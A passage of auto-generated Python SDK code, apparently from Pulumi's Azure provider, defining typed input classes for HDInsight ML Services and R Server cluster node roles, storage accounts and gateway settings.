A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class MLServicesClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class MLServicesClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class MLServicesClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight ML Services Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight ML Services Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class RServerClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class RServerClusterRolesArgs:
def __init__(__self__, *,
edge_node: pulumi.Input['RServerClusterRolesEdgeNodeArgs'],
head_node: pulumi.Input['RServerClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['RServerClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['RServerClusterRolesZookeeperNodeArgs']):
"""
:param pulumi.Input['RServerClusterRolesEdgeNodeArgs'] edge_node: A `edge_node` block as defined above.
:param pulumi.Input['RServerClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['RServerClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['RServerClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
"""
pulumi.set(__self__, "edge_node", edge_node)
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
@property
@pulumi.getter(name="edgeNode")
def edge_node(self) -> pulumi.Input['RServerClusterRolesEdgeNodeArgs']:
"""
A `edge_node` block as defined above.
"""
return pulumi.get(self, "edge_node")
@edge_node.setter
def edge_node(self, value: pulumi.Input['RServerClusterRolesEdgeNodeArgs']):
pulumi.set(self, "edge_node", value)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['RServerClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['RServerClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['RServerClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['RServerClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['RServerClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['RServerClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class RServerClusterRolesEdgeNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
